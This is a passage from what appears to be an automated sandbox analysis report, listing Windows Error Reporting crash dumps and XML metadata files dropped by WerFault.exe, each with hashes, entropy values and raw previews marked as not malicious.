.F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.1.3.6.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WER900A.tmp.xml

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4674
Entropy (8bit):	4.453525744253134
Encrypted:	false
SSDEEP:	48:cvIwSD8zssJgtWI98aWgc8sqYjoP8fm8M4JbHvMFA+q8vcHvqr8MjT9d:uITfq/bgrsqYVJrxKqqr8MX9d
MD5:	5C70F94F1EF1582B9BFE2F4CE377DC70
SHA1:	463E5465615FB5807C58D12AE4593458CD95DA40
SHA-256:	9CC0DCE863AC060D39A32D22C2124BC6D2617DAAC628E848E814C409687C9797
SHA-512:	FE0223271D7E24F0D42AD35D4F586ADBC1ABE0D28D88AD59643E6F7811D3D108EB5B6AB4DF008522DCCAD793DD1E59D294298010EBAB388CD8DDA3E016067906
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1719952" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\ProgramData\Microsoft\Windows\WER\Temp\WER94FA.tmp.dmp

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Tue Oct 4 00:42:00 2022, 0x1205a4 type
Category:	dropped
Size (bytes):	79772
Entropy (8bit):	2.037655675391333
Encrypted:	false
SSDEEP:	384:IsLWzLMPzFAGL8+TktyCULFAlwUmx88jpymYMf4t:rW8PzhL8+UwRAlIx88jQN
MD5:	54F01D7297453DC3CFE45337EE0C14A0
SHA1:	54FCC94E3EB987FCA465D35BBCBD2CFB3ADE064C
SHA-256:	EB61EC58D391F3EF1168AEC6A317F0499F14FFCC5E3051FCDCEF80962BC59563
SHA-512:	9044C8DAAEB327D118EB288E85AFFA65187730AF162FDAFD5A1FB37671F2C4F6F4C22E2DFD253FAB3DFF506094E2DA0390A04D2A3B2CD0BFD5E99B7C5CCD97EA
Malicious:	false
Preview:	MDMP....... .......X.;c........................4...........t....7..........T.......8...........T...........p...,............................................................................................U...........B......D.......GenuineIntelW...........T...........O.;c.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER96EF.tmp.WERInternalMetadata.xml

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8388
Entropy (8bit):	3.6960123490084587
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNiWCY6st6YqASURgYgmf6VSjCpBX89bjFtsfqhm:RrlsNiq6W6YNSURgYgmfkSBjFmfV
MD5:	3BAB7503C3B2BA70B284BDFB0A40D246
SHA1:	C38EBF49B1CB2372B9669EBDF9D0E4E90A6C9886
SHA-256:	96EBEFA82FCCD228A16F3497064584A4AF5192D66248B7AFBA92DFDE530772BD
SHA-512:	85D4045387573010789FE083314D941FF13C4CFD8B0CD80AB717BF32D658DBF6ACA7620EFFA601806947CEE40C4B7B690D0A81893D5F7B66588A87FDA79288C3
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.1.3.6.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WER978C.tmp.xml

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4674
Entropy (8bit):	4.452631514522998
Encrypted:	false
SSDEEP:	48:cvIwSD8zssJgtWI98aWgc8sqYjou8fm8M4JbHvMFoi+q8vcHvqr8MjT9d:uITfq/bgrsqYyJrliKqqr8MX9d
MD5:	45F886677DB7CEC09B2234D0671E60C3
SHA1:	ED9CB10ED8053EFB9C85CE3478350DF368090106
SHA-256:	6D36ECE4A4FAF1FA823ECEF51231819ACD3B8A25259B6C119E56E619FBCFB325
SHA-512:	AEA39E0D29EC539109EF1ACA3461432E599557DEB065BBD7FF43AAE73D4E4C5CF33A9F13B7A6FE87B49AE5692F66C696E7B90E72C3729E0C1BAE99F46AB2CDD5
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1719952" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9C6C.tmp.dmp

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Tue Oct 4 00:42:02 2022, 0x1205a4 type
Category:	dropped
Size (bytes):	79232
Entropy (8bit):	2.0472171480861854
Encrypted:	false
SSDEEP:	384:iHnWzL5Py8i0f/VAGL8+TWhyCULFAlwUmx885tnN8Gg:kWpPy5KL8+ihwRAlIx88538Gg
MD5:	501EBA6100225B651449575A81920354
SHA1:	4DE219267AA09D175C866EDA0443AD9CF573961E
SHA-256:	7ACECEBE0FFA63F119B01E8DD09E0B5F127F2C9D6409075C68E22D9AB12C3427
SHA-512:	73F73F5C73D02EA2D36F83506761F91FB8529BBC66CB504DB719B598824F612CE9190F97959D68A70BE70C4E4F51313C9A2E4DABB51154FEFE7ADF0671DDF5EA
Malicious:	false
Preview:	MDMP....... .......Z.;c........................4................7..........T.......8...........T...........p................................................................................................U...........B......D.......GenuineIntelW...........T...........O.;c.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9EA0.tmp.WERInternalMetadata.xml

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8390
Entropy (8bit):	3.6974924360346533
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNiWCjJ6+6YqpSUAjcgmf6VSjCpBP89bxFtsfnk7m:RrlsNiJJ6+6YkSUAjcgmfkSJxFmfF
MD5:	84FBCF6B924692D26B6E030DBC2B434B
SHA1:	EC857E5FC4585AD1EDEC09794A0EFA94FA49008C
SHA-256:	6BEE6EE9C2E11BBA8FD5056DF1F1119910E5FEA3501086E4482208EF1FC660BF
SHA-512:	704F8C81EA8893767F44B40FACE4396B9A524762E0548794BF3CC117771F429879B7CDC2C613B76905AF1A99145215ACA33D5336A75B3D65B42A685C68B841A8
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.1.3.6.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9F2D.tmp.xml

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4674
Entropy (8bit):	4.456122924723511
Encrypted:	false
SSDEEP:	48:cvIwSD8zssJgtWI98aWgc8sqYjoz8fm8M4JbHvMFO/+q8vcHvqr8MjT9d:uITfq/bgrsqYBJrHKqqr8MX9d
MD5:	0088B2AD01BBBE453F23265547F12EF2
SHA1:	2692AA3B1D7A55AA66F86EEE35B55F5EB3801852
SHA-256:	F481B14753FEEC023063B853F47AC6D088F880311814D1F3A59B58AC8BA7A3E0
SHA-512:	91E68A5849A548F72A72B05ADFB2F2B295BA7968A9C9222C2DABC97524917F92E706BFD81AA9AD979CB8B8E0FFC0212537D76280E85D219DCC7FB6978FDA767F
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1719952" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA536.tmp.dmp

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Tue Oct 4 00:42:04 2022, 0x1205a4 type
Category:	dropped
Size (bytes):	79264
Entropy (8bit):	2.0877625606385917
Encrypted:	false
SSDEEP:	384:EVGWzL2hPk1gzuL8+TWko7salytULFAlwUmx885dWxy8/KGu:tWGhPkiuL8+i8iTRAlIx885gxXK
MD5:	470818919662D307B6A19FA50D2987CA
SHA1:	E25D3E406E869249EC2FCAD4C0D81A7F0C843B94
SHA-256:	8EC4090C8071CD8A57B013F96AA05D27DE35D7837352B87C4B5EB95B9097D3B0
SHA-512:	2F88968352E427DD3118DC91435E9772F829BA98154F14242D2CB418F6920C352E6B9D730533B64538E759A9E1D487490D228A95A204800B2B4E6E37FCF3001D
Malicious:	false
Preview:	MDMP....... .......\.;c........................4................7..........T.......8...........T............................................................................................................U...........B......D.......GenuineIntelW...........T...........O.;c.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA72B.tmp.WERInternalMetadata.xml

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8390
Entropy (8bit):	3.6953104011768794
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNiWCP6K66YqUSUWCPgmf6VSjCpBV89bHFtsfKtm:RrlsNiN6n6YZSUWCPgmfkSLHFmfJ
MD5:	1636ADDDB6C0F6E53F832434BBEFB6BD
SHA1:	C6ECD3F882F2625D7549A5673B7B479CE5D39201
SHA-256:	D9F02508430FD725808D67DA0D1C5564644A412A0F9F39A1E18120318AD3659F
SHA-512:	EC055C3C8191FA980530FEF070F3FCC7B4D97E580D862F745196175AD9709103202766FD3D3E00B4B7BE890354CFA9DD97CA46D286D54E8C67EA725412F3BFB6
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.1.3.6.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA78A.tmp.xml

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4674
Entropy (8bit):	4.456263353016033
Encrypted:	false
SSDEEP:	48:cvIwSD8zssJgtWI98aWgc8sqYjo+8fm8M4JbHvMF1S+q8vcHvqr8MjT9d:uITfq/bgrsqY2JrxKqqr8MX9d
MD5:	1A67183B664D5396AC90BCE7F8D77062
SHA1:	539AE5C0B3475C683B6DC11E36F5F698B3C207EA
SHA-256:	D4EAE1BBDD311AAD058B31DC6F208116082160FCAE65677521D4C994EE53803C
SHA-512:	529AF5C8F610131E95821A51149BD3364B1EA6F7A2F75B54A99CB82B00ED7023A62A6559D6134A792D113E0392AECF563D6712F1991BC98E764C800847C41FF7
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1719952" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA939.tmp.dmp

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Tue Oct 4 00:43:11 2022, 0x1205a4 type
Category:	dropped
Size (bytes):	113082
Entropy (8bit):	2.0681107619964303
Encrypted:	false
SSDEEP:	768:RPUH0JCnn8JQCNQJzt3+RAldV8TYmgp6vAowMYM/b+:dCn8JQC+Jzt3CAbV8TYmgwIowPq+
MD5:	1CD5E8D618E7AF73D8C5A95EB5F7D13A
SHA1:	6829EC55852FA97ECC14D0F2E4BE9E8D38B4EB8E
SHA-256:	DED1A84CA6C8F8FEC0735A0551261878B97A43A22D5B944933BEE53428A761A6
SHA-512:	76AA362C5B37F1A1B0DDBB573C5A5D1236ECA8F5AC0DED3845F7778B453BC361933DDB71446232E055F518EBC7DD193B4250D39D24C9B8D064B8FEADA29F1273
Malicious:	false
Preview:	MDMP....... .........;c............D...............L...........LM..........T.......8...........T............;...}........... ..........."...................................................................U...........B......."......GenuineIntelW...........T...........O.;c.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERACE3.tmp.WERInternalMetadata.xml

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8402
Entropy (8bit):	3.695268157666598
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNiWCM6iaH6Yq4SUrDOgmf6aSR1XCpBF89baFtsf0Zem:RrlsNiO6p6Y1SUrDOgmfvSTfaFmfQ
MD5:	3DA7A1F94690E182E41D04C2DF514666
SHA1:	9C833398102B6E3F55376419D024BA304147BCD4
SHA-256:	1A2A7860B68F16D8C409A5BB075AFA96413558BD1F835E8F7757650885C9CF39
SHA-512:	BCA4C8B3E6EA67CB845E2184C5A7E5740AC918776DEB52FEBA3F0CA48A029ECB7C8C09FF181DD5DF68FAC95F625B613363432128155D6A26A9F46CD66800E791
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.1.3.6.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WERAD52.tmp.xml

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4674
Entropy (8bit):	4.454942285825875
Encrypted:	false
SSDEEP:	48:cvIwSD8zsTJgtWI98aWgc8sqYjoX8fm8M4JbKvMFu+q8vcKvqr8MjT9d:uITft/bgrsqYlJmLKzqr8MX9d
MD5:	6B49AB18F657E83D0C96F55D730709B3
SHA1:	10F38FEEAFA26ABED937FA4B65541C817D3FE825
SHA-256:	C6CBAD0266BF9D2E9AD1EE5C7C353068D5AA8BF8C9C1FF3B94322D67C86F06B7
SHA-512:	8136B4377310E824D15537BC2B094D8A002A00B536ED6C972226D7DAA4F6203F7DADD5846D79A2E16987D51A82A1DE850BFDC39580CB69C7538C753DB4CEF518
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1719953" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB6DA.tmp.dmp

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Tue Oct 4 00:42:10 2022, 0x1205a4 type
Category:	dropped
Size (bytes):	85942
Entropy (8bit):	2.0420210498869147
Encrypted:	false
SSDEEP:	384:A8tzCP8nwgkuMP8+TWmAaLFAlwUnh885kSXOzKzmTC4JQ:3MP8SuMP8+imAaRAldh885kZWo1Q
MD5:	362B1A24405D371A8E39204A12A3E004
SHA1:	7C58D10FAD08E31F6D99971013950D009EAC0E88
SHA-256:	F4F57A4188D2351CFBEEC4A8E5E5BC5541C169BDED60B6027128200FF84B39DF
SHA-512:	E146D51BEEAC5CDB7BE1ECED9CAFEA957A67E0FA89C7F3BA5D7DC021799BD079F3D0870D9EE0CFC7E00BE8DDADFA68CA3F40E93C879983BC5ABB149081D263EF
Malicious:	false
Preview:	MDMP....... .......b.;c........................x...............H<..........T.......8...........T...........P$..f+..........4........... ....................................................................U...........B..............GenuineIntelW...........T...........O.;c.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERC060.tmp.WERInternalMetadata.xml

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8394
Entropy (8bit):	3.6940263305917
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNiWCD6IkxMUe6YqcSUEgPTgmf6VSjCpB089byFtsfNmm:RrlsNih6IkxO6YxSUZPTgmfkSoyFmfV
MD5:	57B6D4BCD81AB570F18B284953B6CF0B
SHA1:	E34A33A7EE7DBD6B3E348E74EFA85AE37F95DBB7
SHA-256:	C72E814A8E2F9D466266347CC3496B1DCB6A418701E3515A379CD5A143608B90
SHA-512:	93FC90F6D7017395FDDFEEA31D5BD89F18ECE614D4D513C1D250079DE59EA243E51E027E85DC6D87EDA0E3F12451641926FFEE219EAC9DC0CC1AFBD00EA64CFF
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.1.3.6.<./.P.i.d.>.......

